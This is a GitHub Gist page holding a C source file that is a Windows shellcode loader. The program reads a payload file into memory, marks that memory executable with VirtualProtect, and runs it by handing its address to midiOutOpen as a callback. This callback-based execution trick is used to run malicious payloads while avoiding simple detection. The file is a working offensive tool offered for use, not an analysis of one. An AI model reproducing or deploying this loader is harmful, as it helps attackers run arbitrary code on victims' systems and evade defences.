Created
October 9, 2025 18:03
-
-
Save SaumyajeetDas/43270206f0b12124b90953f945f23561 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Saumyajeet Das | |
| // Written/Compiled: Visual Studio 2022 | |
| // Usage: midiOutOpen.exe <shellcode file> | |
| #pragma comment(lib, "winmm.lib") | |
| #include <stdio.h> | |
| #include <Windows.h> | |
| #include <mmsystem.h> | |
| BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize); | |
| INT wmain(INT argc, WCHAR* argv[]) | |
| { | |
| BOOL Ret = FALSE; | |
| DWORD SCLen = 0; | |
| PCHAR Shellcode = NULL; | |
| HMIDIOUT hMidiDevice = NULL; | |
| PVOID hAlloc = NULL; | |
| DWORD oldProtect = 0; | |
| MMRESULT result = MMSYSERR_NOERROR; | |
| printf("========================================\n"); | |
| printf(" midiOutOpen Shellcode Execution\n"); | |
| printf("========================================\n"); | |
| if (argc != 2) | |
| { | |
| printf("[!] Usage: midiOutOpen.exe <shellcode.bin>\n"); | |
| goto CLEANUP; | |
| } | |
| printf("[*] Reading shellcode from: %ws\n", argv[1]); | |
| Sleep(1000); | |
| Ret = ReadContents(argv[1], &Shellcode, &SCLen); | |
| if (!Ret) | |
| goto CLEANUP; | |
| printf("[*] Allocating memory for shellcode\n"); | |
| Sleep(1000); | |
| hAlloc = VirtualAlloc(NULL, SCLen, | |
| MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
| if (!hAlloc) | |
| goto CLEANUP; | |
| memcpy(hAlloc, Shellcode, SCLen); | |
| printf("[*] Setting memory permissions to executable\n"); | |
| Sleep(1000); | |
| Ret = VirtualProtect(hAlloc, SCLen, PAGE_EXECUTE_READ, &oldProtect); | |
| if (!Ret) | |
| goto CLEANUP; | |
| printf("[*] Executing Shellcode \n"); | |
| Sleep(1000); | |
| result = midiOutOpen(&hMidiDevice, MIDI_MAPPER, | |
| (DWORD_PTR)hAlloc, 0, CALLBACK_FUNCTION); | |
| if (result != MMSYSERR_NOERROR) | |
| goto CLEANUP; | |
| CLEANUP: | |
| if (hMidiDevice) | |
| midiOutClose(hMidiDevice); | |
| if (Shellcode) | |
| free(Shellcode); | |
| if (hAlloc) | |
| VirtualFree(hAlloc, 0, MEM_RELEASE); | |
| return 0; | |
| } | |
| BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize) | |
| { | |
| FILE* f = NULL; | |
| _wfopen_s(&f, Filepath, L"rb"); | |
| if (f) | |
| { | |
| fseek(f, 0, SEEK_END); | |
| *BufferSize = ftell(f); | |
| fseek(f, 0, SEEK_SET); | |
| *Buffer = (PCHAR)malloc(*BufferSize); | |
| if (*Buffer) | |
| { | |
| fread(*Buffer, *BufferSize, 1, f); | |
| } | |
| fclose(f); | |
| } | |
| return (*BufferSize != 0 && *Buffer != NULL) ? TRUE : FALSE; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment